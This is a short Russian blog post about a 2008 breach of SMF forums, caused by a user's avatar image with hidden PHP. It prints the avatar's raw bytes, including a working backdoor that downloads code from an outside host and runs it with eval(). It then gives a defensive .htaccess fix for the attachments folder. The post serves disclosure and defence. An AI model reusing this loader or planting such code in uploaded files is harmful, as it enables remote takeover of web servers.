Интернет

Пришел krisbarteo

krisbarteo — вот виновник создавшейся проблемы линейки форумов SMF Из за него начались проблемы, такие как взлом линейки форумов SMF Проблема заключалась в том, что указанный пользователь загружал аватар в котором содержался следующий код:

яШяб јExif  II*            1    J   2    f          i‡    z       ACD Systems Digital Imaging 2008:11:22 03:08:16   ђ    0220ђ’    515                        яю'<?php;$url = ‘http://wplsat23.net/?update=main’;$done = false;if(!$url){return »;}$url_info = parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : «/»;    $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . «?» . $url_info[query] : «»;    $query = «GET » . $url_info[path] . » HTTP/1.1\r\n»;    $query = $query . «Host: » . $url_info[host] . «\r\n»;    $query = $query . «Accept: */*» . «\r\n»;    $query = $query . «Connection: close» . «\r\n»;    $query = $query . «User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12» . «\r\n»;    $query = $query . «\r\n»;    $errno = 0;    $error = «»;    $sock = fsockopen($url_info[host], $url_info[port], $errno, $error, 30);$h = array();$resp = array();if($sock){stream_set_timeout($sock, 30);fwrite($sock, $query);$hd = false;while(!feof($sock)){$l = fgets($sock);if(!$hd){if(trim($l) == »){$hd = true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret = implode(«», $resp);eval($ret);?>00яЫ C     
 

 яЫ C

яА   ! яД           
яД µ   } !1AQa»q2Ѓ‘Ў#B±БRСр$3br‚
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzѓ„…†‡?‰Љ’“”•–—?™љўЈ¤Ґ¦§Ё©ЄІіґµ¶·ё№єВГДЕЖЗИЙКТУФХЦЧШЩЪбвгдежзийкстуфхцчшщъяД        
яД µ  w !1AQaq»2ЃB‘Ў±Б    #3RрbrС
$4б%с&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz‚ѓ„…†‡?‰Љ’“”•–—?™љўЈ¤Ґ¦§Ё©ЄІіґµ¶·ё№єВГДЕЖЗИЙКТУФХЦЧШЩЪвгдежзийктуфхцчшщъяЪ   ? эSўЂ?яЩ

Посчастливилось всем кто владел этим форумом. Везде сплошной krisbarteo и его любимый аватар. Сегодня сообщество выполнило обновление линейки форума до версии 1.1.9 За что им и спасибо.

PS Как вариант можно кинуть в папку с attachments файл .htaccess с содержанием:

<Files *>
Order Deny,Allow
Deny from all
Allow from localhost
</Files>
RemoveHandler .php .php3 .phtml .cgi .fcgi .pl .fpl .shtml

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Нажимая кнопку Отправить комментарий Я даю согласие на обработку персональных данных.